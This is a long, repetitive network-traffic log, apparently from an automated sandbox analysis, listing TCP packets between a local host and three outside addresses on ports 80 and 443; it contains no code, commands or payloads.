                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global traffic  TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
